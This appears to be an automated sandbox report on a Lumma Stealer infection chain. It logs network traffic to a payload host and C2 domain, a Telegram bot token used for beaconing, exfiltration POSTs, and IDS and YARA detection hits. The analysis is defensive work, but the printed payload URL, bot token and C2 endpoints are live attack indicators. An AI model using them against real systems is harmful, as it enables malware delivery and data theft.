            Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.pdb source: powershell.exe, 00000025.00000002.1915834227.0000000005718000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.pdb source: powershell.exe, 0000001B.00000002.1861999388.00000000056D5000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.pdb source: powershell.exe, 00000018.00000002.1835577839.0000000004D85000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6F957B70 FindFirstFileExW, 0_2_6F957B70
            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_6F957C21 FindFirstFileExW, FindNextFileW, FindClose, FindClose, 4_2_6F957C21
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, File opened: C:\Users\user\3D Objects
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, File opened: C:\Users\user\AppData\Local\Packages
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, File opened: C:\Users\user\AppData\Local\CEF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, File opened: C:\Users\user\AppData\Local
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, File opened: C:\Users\user\AppData\Local\Mozilla
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, File opened: C:\Users\user\AppData\Local\PeerDistRepub

            Software Vulnerabilities

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

            Networking

            Source: Network traffic, Suricata IDS: 2800029 - Severity 1 - ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass : 147.45.44.131:80 -> 192.168.2.4:49741
            Source: Network traffic, Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49751 -> 104.21.60.24:443
            Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49751 -> 104.21.60.24:443
            Source: Network traffic, Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49747 -> 104.21.60.24:443
            Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49747 -> 104.21.60.24:443
            Source: Network traffic, Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49752 -> 104.21.60.24:443
            Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49752 -> 104.21.60.24:443
            Source: Network traffic, Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49759 -> 104.21.60.24:443
            Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49767 -> 104.21.60.24:443
            Source: Network traffic, Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49732 -> 149.154.167.220:443
            Source: Network traffic, Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49731 -> 149.154.167.220:443
            Source: Network traffic, Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49746 -> 104.21.60.24:443
            Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49746 -> 104.21.60.24:443
            Source: Network traffic, Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49750 -> 104.21.60.24:443
            Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49750 -> 104.21.60.24:443
            Source: Network traffic, Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49730 -> 149.154.167.220:443
            Source: Network traffic, Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49745 -> 104.21.60.24:443
            Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49745 -> 104.21.60.24:443
            Source: Network traffic, Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49733 -> 149.154.167.220:443
            Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49773 -> 104.21.60.24:443
            Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49776 -> 104.21.60.24:443
            Source: Network traffic, Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49755 -> 104.21.60.24:443
            Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49755 -> 104.21.60.24:443
            Source: unknown, DNS query: name: api.telegram.org
            Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK; Date: Fri, 27 Dec 2024 21:33:06 GMT; Server: Apache/2.4.52 (Ubuntu); Last-Modified: Wed, 25 Dec 2024 00:05:52 GMT; ETag: "8e00-62a0cfe2cdd29"; Accept-Ranges: bytes; Content-Length: 36352; Keep-Alive: timeout=5, max=100; Connection: Keep-Alive; Content-Type: application/x-msdos-program
            Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Fri, 27 Dec 2024 21:33:09 GMT | Server: Apache/2.4.52 (Ubuntu) | Last-Modified: Wed, 25 Dec 2024 16:22:08 GMT | ETag: "4c000-62a1aa1957b5c" | Accept-Ranges: bytes | Content-Length: 311296 | Content-Type: application/x-msdos-program
            Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Fri, 27 Dec 2024 21:33:09 GMT | Server: Apache/2.4.52 (Ubuntu) | Last-Modified: Wed, 25 Dec 2024 16:22:08 GMT | ETag: "4c000-62a1aa1957b5c" | Accept-Ranges: bytes | Content-Length: 311296 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdos-program
            Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Fri, 27 Dec 2024 21:33:10 GMT | Server: Apache/2.4.52 (Ubuntu) | Last-Modified: Wed, 25 Dec 2024 00:05:52 GMT | ETag: "8e00-62a0cfe2cdd29" | Accept-Ranges: bytes | Content-Length: 36352 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdos-program
            Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Fri, 27 Dec 2024 21:33:12 GMT | Server: Apache/2.4.52 (Ubuntu) | Last-Modified: Wed, 25 Dec 2024 16:22:08 GMT | ETag: "4c000-62a1aa1957b5c" | Accept-Ranges: bytes | Content-Length: 311296 | Content-Type: application/x-msdos-program
            Source: global traffic | HTTP traffic detected: GET /infopage/ubvsd.exe HTTP/1.1 | X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq | Host: 147.45.44.131 | Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /infopage/hgfpj.exe HTTP/1.1 | X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq | Host: 147.45.44.131
            Source: global traffic | HTTP traffic detected: GET /infopage/hgfpj.exe HTTP/1.1 | X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq | Host: 147.45.44.131 | Connection: Keep-Alive
            Source: Joe Sandbox View | IP Address: 149.154.167.220
            Source: Joe Sandbox View | IP Address: 147.45.44.131
            Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
            Source: Joe Sandbox View | ASN Name: FREE-NET-ASFREEnetEU
            Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 104.21.60.24:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49757 -> 104.21.60.24:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49752 -> 104.21.60.24:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49749 -> 104.21.60.24:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49750 -> 104.21.60.24:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49751 -> 104.21.60.24:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49759 -> 104.21.60.24:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49765 -> 104.21.60.24:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49763 -> 104.21.60.24:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49766 -> 104.21.60.24:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49761 -> 104.21.60.24:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49769 -> 104.21.60.24:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49746 -> 104.21.60.24:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49770 -> 104.21.60.24:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49747 -> 104.21.60.24:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49772 -> 104.21.60.24:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49775 -> 104.21.60.24:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49774 -> 104.21.60.24:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49773 -> 104.21.60.24:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49762 -> 104.21.60.24:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49776 -> 104.21.60.24:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49755 -> 104.21.60.24:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49764 -> 104.21.60.24:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49767 -> 104.21.60.24:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49771 -> 104.21.60.24:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49768 -> 104.21.60.24:443
            Source: global traffic | HTTP traffic detected: POST /bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted! HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Content-Type: application/x-www-form-urlencoded | Host: api.telegram.org | Content-Length: 0 | Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: fivenaii.click
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 52 | Host: fivenaii.click
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=K29GIXJ1E8TBCVOBTV | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 18168 | Host: fivenaii.click
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=6G55XVIVJGCYD2KDH6P | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8795 | Host: fivenaii.click
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=K1R1QCQ80Y27RGQNZZ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20442 | Host: fivenaii.click
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=C9M7QTVU9XVV7VB4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1272 | Host: fivenaii.click
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=L0O4KIZ8 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 18108 | Host: fivenaii.click
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=CP7BM4U9RCKUZ8R | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8771 | Host: fivenaii.click
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=NK6VN6CQ4BZSATYGE | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 571134 | Host: fivenaii.click
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=XMTXEG4X2SM0IQWLM8F | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20448 | Host: fivenaii.click
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 87 | Host: fivenaii.click
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=5Q02JBRDU7U42EA | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1231 | Host: fivenaii.click
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=6DGF095Y82K79M6X | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 18156 | Host: fivenaii.click
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=FRHHII88EX2SEMY7YY | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8789 | Host: fivenaii.click
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=9KREDXIF8S0UJ1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 571116 | Host: fivenaii.click
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=K0RL857YU4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20394 | Host: fivenaii.click
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=LO675W50 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1189 | Host: fivenaii.click
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=E8126BCFD | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 571086 | Host: fivenaii.click
            Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: global traffic HTTP traffic detected: GET /infopage/pilgm.ps1 HTTP/1.1 Host: 147.45.44.131 User-Agent: curl/7.83.1 Accept: */* X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
            Source: global traffic HTTP traffic detected: GET /infopage/ubvsd.exe HTTP/1.1 X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq Host: 147.45.44.131 Connection: Keep-Alive
            Source: global traffic HTTP traffic detected: GET /infopage/hgfpj.exe HTTP/1.1 X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq Host: 147.45.44.131
            Source: global traffic HTTP traffic detected: GET /infopage/hgfpj.exe HTTP/1.1 X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq Host: 147.45.44.131 Connection: Keep-Alive
            Source: global traffic DNS traffic detected: DNS query: api.telegram.org
            Source: global traffic DNS traffic detected: DNS query: fivenaii.click
            Source: unknown HTTP traffic detected: POST /bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted! HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 0 Connection: Keep-Alive
            Source: iviewers.dll String found in binary or memory: http://147.45.44.131/infopage/pilgm.ps1
            Source: iviewers.dll String found in binary or memory: https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=76540
            Source: RegAsm.exe String found in binary or memory: https://fivenaii.click:443/api
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49746 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49745 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49747 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49750 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49751 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49752 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49755 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49757 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49759 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49761 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49762 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49763 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49764 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49765 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49766 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49767 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49768 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49769 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49770 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49771 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49772 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49773 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49774 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49775 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.60.24:443 -> 192.168.2.4:49776 version: TLS 1.2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_00433E30 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,45_2_00433E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_004348C2 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,45_2_004348C2

            System Summary

            Source: Process Memory Space: powershell.exe PID: 7760, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 7824, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 7880, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 6588, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: 24.2.powershell.exe.4d8584c.1.raw.unpack, Knvbl.csLong String: Length: 14784
            Source: 24.2.powershell.exe.4d73b34.0.raw.unpack, Knvbl.csLong String: Length: 14784
            Source: 27.2.powershell.exe.56d5e3c.3.raw.unpack, Knvbl.csLong String: Length: 14784
            Source: 27.2.powershell.exe.56c4124.0.raw.unpack, Knvbl.csLong String: Length: 14784
            Source: 29.2.powershell.exe.8b20000.4.raw.unpack, Knvbl.csLong String: Length: 14784
            Source: 29.2.powershell.exe.58027a8.0.raw.unpack, Knvbl.csLong String: Length: 14784
            Source: 29.2.powershell.exe.58144c0.2.raw.unpack, Knvbl.csLong String: Length: 14784
            Source: 37.2.powershell.exe.57072b8.1.raw.unpack, Knvbl.csLong String: Length: 14784
            Source: 37.2.powershell.exe.5718fd0.2.raw.unpack, Knvbl.csLong String: Length: 14784
            Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6F952730 appears 35 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00414C90 appears 77 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00407F60 appears 40 times
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 6F952730 appears 35 times
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6F952730 appears 35 times
            Source: iviewers.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
            Source: Process Memory Space: powershell.exe PID: 7760, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 7824, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 7880, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 6588, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: 24.2.powershell.exe.4d8584c.1.raw.unpack, Ntilg.csCryptographic APIs: 'TransformFinalBlock'
            Source: 24.2.powershell.exe.4d73b34.0.raw.unpack, Ntilg.csCryptographic APIs: 'TransformFinalBlock'
            Source: 27.2.powershell.exe.56d5e3c.3.raw.unpack, Ntilg.csCryptographic APIs: 'TransformFinalBlock'
            Source: 27.2.powershell.exe.56c4124.0.raw.unpack, Ntilg.csCryptographic APIs: 'TransformFinalBlock'
            Source: 29.2.powershell.exe.8b20000.4.raw.unpack, Ntilg.csCryptographic APIs: 'TransformFinalBlock'
            Source: 29.2.powershell.exe.58027a8.0.raw.unpack, Ntilg.csCryptographic APIs: 'TransformFinalBlock'
            Source: 29.2.powershell.exe.58144c0.2.raw.unpack, Ntilg.csCryptographic APIs: 'TransformFinalBlock'
            Source: 37.2.powershell.exe.57072b8.1.raw.unpack, Ntilg.csCryptographic APIs: 'TransformFinalBlock'
